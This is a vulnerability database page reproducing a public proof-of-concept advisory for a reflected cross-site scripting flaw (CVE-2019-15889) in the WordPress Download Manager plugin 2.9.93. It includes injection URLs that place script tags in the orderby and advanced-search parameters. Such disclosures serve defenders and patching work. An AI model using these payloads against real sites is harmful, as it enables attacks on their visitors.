Vulners
Lucene search
WordPress Download Manager 2.9.93 Plugin - Cross-Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | WordPress Download Manager Cross-Site Scripting Vulnerability (CNVD-2019-31832) | 4 Sep 201900:00 | – | cnvd |
 | CVE-2019-15889 | 3 Sep 201917:07 | – | cve |
 | CVE-2019-15889 | 3 Sep 201917:07 | – | cvelist |
 | WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting | 4 Sep 201900:00 | – | exploitdb |
 | WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting | 4 Sep 201900:00 | – | exploitpack |
 | WordPress Download Manager <2.9.94 - Cross-Site Scripting | 24 Jun 202603:02 | – | nuclei |
 | CVE-2019-15889 | 3 Sep 201918:15 | – | nvd |
 | WordPress Download Manager Plugin < 2.9.94 XSS Vulnerability | 12 Sep 201900:00 | – | openvas |
 | CVE-2019-15889 | 3 Sep 201918:15 | – | osv |
 | WordPress Download Manager 2.9.93 Cross Site Scripting | 4 Sep 201900:00 | – | packetstorm |
10
* Exploit Title: WordPress Download Manager Cross-site Scripting
* Exploit Author: ThuraMoeMyint
* Author Link: https://twitter.com/mgthuramoemyint
* Vendor Homepage: https://www.wpdownloadmanager.com
* Software Link: https://wordpress.org/plugins/download-manager
* Version: 2.9.93
* Category: WebApps, WordPress
CVE:CVE-2019-15889
Description
--
In the pro features of the WordPress download manager plugin, there is
a Category Short-code feature witch can use to sort categories with
order by a function which will be used as ?orderby=title,publish_date
.
By adding parameter "> and add any XSS payload , the xss payload will execute.
To reproduce,
1.Go to the link where we can find ?orderby
2.Add parameters >” and give simple payload like <script>alert(1)</script>
3.The payload will execute.
--
PoC
--
<div class="btn-group btn-group-sm pull-right"><button type="button"
class="btn btn-primary" disabled="disabled">Order &nbps;</button><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=asc">Asc</a><a
class="btn btn-primary"
href="https://server/wpdmpro/category-short-code/?orderby=publish_date\"><script>alert(11)</script>&order=desc">Desc</a></div>
--
Demo
--
https://server/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc
--
Another reflected cross-site scripting via advance search
https://server/wpdmpro/advanced-search/
https://server/wpdmpro/advanced-search/?search[publish_date]=2019-04-17+to+2019-04-17%22%3E%3Cscript%3Ealert(1)%3C/script%3E&search[update_date]=&search[view_count]=&search[download_count]=&search[package_size]=&search[order_by]=&search[order]=ASC&q=a
# 0day.today [2019-12-04] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Sep 2019 00:00Current
EPSS0.12531